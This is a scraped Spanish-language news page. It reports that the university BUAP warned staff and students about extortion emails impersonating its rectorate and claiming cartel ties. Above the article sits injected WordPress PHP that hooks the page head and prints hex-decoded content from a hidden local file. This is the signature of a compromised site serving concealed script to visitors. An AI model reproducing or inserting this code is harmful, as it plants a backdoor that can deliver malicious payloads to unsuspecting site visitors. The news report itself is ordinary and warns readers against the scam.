if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Alerta BUAP posible extorsión a la comunidad universitaria – La Opinión Universitaria La Opinión Universitaria
Menu

Alerta BUAP posible extorsión a la comunidad universitaria

 

  • Ya se están realizando las acciones legales correspondientes

Por Diego Cuautle

A través de un comunicado que se dio a conocer en la página oficial de la Benemérita Universidad Autónoma de Puebla (BUAP), la institución alertó a la comunidad universitaria sobre la posible extorsión por lo se estarían tomando las acciones legales correspondientes.

En el breve texto, se puede leer el siguiente mensaje: “A toda la comunidad universitaria, se les informa que en diversas Unidades Académicas y Dependencias Administrativas, se ha estado recibiendo un correo supuestamente de rectoría joseesparza_buap@yahoo.com”.

Se agrega que en dicho medio se pide concertar una cita r recibir a una persona de nombre Ingeniero Pedro Torres Martínez y señalan como contacto al número telefónico 2451107572.

De acuerdo a la BUAP, se ha indagado y al parecer no es la única universidad que ha recibido otros correos ya que el motivo de acuerdo a lo que se señala, es extorsionar, además dicen ser parte del Cartel Jalisco Nueva Generación.

Ante dicha situación, la Máxima Casa de Estudios del Estado, indica que se están llevando a cabo las acciones legales correspondientes por lo que reitera a los universitarios a no dejarse sorprender.

De presentarse dicha situación y en caso de tener alguna duda o información adicional será recibida en la oficina de la Abogada General.

 

  • No comments

    Deja una respuesta

    Tweets recientes